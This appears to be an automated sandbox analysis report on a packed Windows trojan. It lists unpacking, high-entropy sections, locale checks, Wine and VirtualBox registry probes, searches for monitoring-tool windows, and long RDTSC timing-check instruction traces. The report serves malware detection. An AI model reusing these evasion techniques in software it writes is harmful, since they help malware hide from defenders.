              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7E7BB0_2_00B7E7BB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098CF830_2_0098CF83
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A707D40_2_00A707D4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7D7250_2_00A7D725
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5CF300_2_00A5CF30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A827060_2_00A82706
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 006C4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: vhjbpyvx ZLIB complexity 0.9944899974043311
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_006E3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_006DCAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XZLVHNGC.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 42%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1831936 > 1048576
              Source: file.exeStatic PE information: Raw size of vhjbpyvx is bigger than: 0x100000 < 0x1a5600

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.6c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vhjbpyvx:EW;susocjsk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vhjbpyvx:EW;susocjsk:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006E6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c30e9 should be: 0x1c00ed
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: vhjbpyvx
              Source: file.exeStatic PE information: section name: susocjsk
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A470BD push ebx; mov dword ptr [esp], ebp0_2_00A470D1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A470BD push edi; mov dword ptr [esp], 3D75466Dh0_2_00A47108
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A470BD push 5A08FC72h; mov dword ptr [esp], edx0_2_00A47122
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A470BD push 13983107h; mov dword ptr [esp], edi0_2_00A47165
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A470BD push 5254201Bh; mov dword ptr [esp], eax0_2_00A471C2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A470BD push esi; mov dword ptr [esp], 5334834Ah0_2_00A471C6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A470BD push esi; mov dword ptr [esp], ebx0_2_00A471DF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A470BD push 7A74EA96h; mov dword ptr [esp], esi0_2_00A471F7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A470BD push ecx; mov dword ptr [esp], eax0_2_00A47203
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE0AE push esi; mov dword ptr [esp], ecx0_2_009CE0EF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE0AE push edi; mov dword ptr [esp], edx0_2_009CE138
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CE0AE push edi; mov dword ptr [esp], esi0_2_009CE206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8709D push ebp; mov dword ptr [esp], esi0_2_00A87101
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8709D push 2FF02BAAh; mov dword ptr [esp], eax0_2_00A8714F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF80EF push eax; mov dword ptr [esp], 340C814Fh0_2_00AF8216
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B328F5 push esi; mov dword ptr [esp], eax0_2_00B328F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B328F5 push ecx; mov dword ptr [esp], edx0_2_00B32923
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6C0FF push eax; mov dword ptr [esp], ecx0_2_00A6C191
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6C0FF push ebx; mov dword ptr [esp], edx0_2_00A6C1C8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6C0FF push 58E28217h; mov dword ptr [esp], ebp0_2_00A6C1ED
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6C0FF push ebx; mov dword ptr [esp], edi0_2_00A6C204
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6C0FF push eax; mov dword ptr [esp], ecx0_2_00A6C21F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6C0FF push ebx; mov dword ptr [esp], ecx0_2_00A6C250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2B0DA push 65E885EBh; mov dword ptr [esp], eax0_2_00B2B182
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4E832 push 3CE53921h; mov dword ptr [esp], ecx0_2_00B4EAA5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4E832 push edi; mov dword ptr [esp], ebx0_2_00B4F2DD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B00821 push ebp; mov dword ptr [esp], esi0_2_00B00846
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE4816 push edi; mov dword ptr [esp], eax0_2_00AE488E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00912850 push edx; mov dword ptr [esp], 507D8A68h0_2_00913BF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00912850 push 1668E80Fh; mov dword ptr [esp], edx0_2_00915B56
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00912850 push 407AEDD1h; mov dword ptr [esp], ecx0_2_00915B6C
              Source: file.exeStatic PE information: section name: vhjbpyvx entropy: 7.952882497591057

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006E6390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25786
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9100A2 second address: 9100A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7ED10 second address: A7ED14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7ED14 second address: A7ED18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86C6B second address: A86C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86C6F second address: A86C80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD320FBh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86E00 second address: A86E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86E04 second address: A86E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB10CD32109h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86E27 second address: A86E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86E2B second address: A86E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86FBC second address: A86FC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86FC5 second address: A86FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB10CD32101h 0x0000000e jmp 00007FB10CD320FDh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86FEC second address: A86FFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB10CBE428Ah 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AB1A second address: A8AB3B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB10CD32106h 0x00000008 jmp 00007FB10CD32100h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AB3B second address: A8AB45 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AB45 second address: A8AB4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AC9C second address: A8ACA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8ACA0 second address: A8ACB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AD47 second address: A8ADA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 70948F16h 0x0000000f push 00000003h 0x00000011 jmp 00007FB10CBE4295h 0x00000016 mov edi, ebx 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b xor eax, 53393774h 0x00000021 jnc 00007FB10CBE428Ch 0x00000027 popad 0x00000028 mov dword ptr [ebp+122D3821h], edx 0x0000002e push 00000003h 0x00000030 mov dl, EBh 0x00000032 add dword ptr [ebp+122D1B8Eh], edi 0x00000038 call 00007FB10CBE4289h 0x0000003d push eax 0x0000003e push edx 0x0000003f ja 00007FB10CBE4288h 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8ADA8 second address: A8ADDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32107h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c js 00007FB10CD320F6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 pop ecx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jl 00007FB10CD32104h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8ADDE second address: A8ADE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8ADE2 second address: A8AE0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jnl 00007FB10CD320FCh 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b jbe 00007FB10CD320F6h 0x00000021 pop edi 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AE0A second address: A8AE0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B99C second address: A9B9A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B9A0 second address: A9B9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9B9A6 second address: A9B9AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6DFA6 second address: A6DFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jp 00007FB10CBE4286h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9B9F second address: AA9BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9BA5 second address: AA9BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9F91 second address: AA9FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FFh 0x00000009 pop edx 0x0000000a js 00007FB10CD320F8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB10CD32100h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9FC4 second address: AA9FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9FC8 second address: AA9FD2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB10CD320F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9FD2 second address: AA9FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9FD8 second address: AA9FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB10CD320F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA147 second address: AAA14B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA2C7 second address: AAA2CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA585 second address: AAA58D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA58D second address: AAA591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA875 second address: AAA879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FF84 second address: A9FF8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FF8A second address: A9FF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FF8E second address: A9FF9C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB10CD320F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9FF9C second address: A9FFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB10CBE4286h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B75F second address: A7B78D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32102h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FB10CD320F6h 0x0000000f jmp 00007FB10CD32102h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B78D second address: A7B793 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB2CE second address: AAB2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jg 00007FB10CD320F6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB2DA second address: AAB2FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB10CBE4294h 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB2FD second address: AAB303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB303 second address: AAB308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB5D0 second address: AAB5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FB10CD32102h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB5EB second address: AAB62C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE4292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b jnl 00007FB10CBE429Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FB10CBE4286h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB62C second address: AAB630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF63B second address: AAF641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB600F second address: AB6044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ebx 0x00000009 jmp 00007FB10CD32101h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 jmp 00007FB10CD32105h 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB640A second address: AB6410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6410 second address: AB6433 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB10CD32109h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6433 second address: AB6439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB670C second address: AB671E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB10CD320F6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A79D00 second address: A79D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6A1E second address: AB6A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FDh 0x00000009 pop edx 0x0000000a jmp 00007FB10CD320FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6A42 second address: AB6A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6A48 second address: AB6A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6A4C second address: AB6A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB10CBE4292h 0x0000000e jmp 00007FB10CBE428Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB6A73 second address: AB6A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB78F5 second address: AB78F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
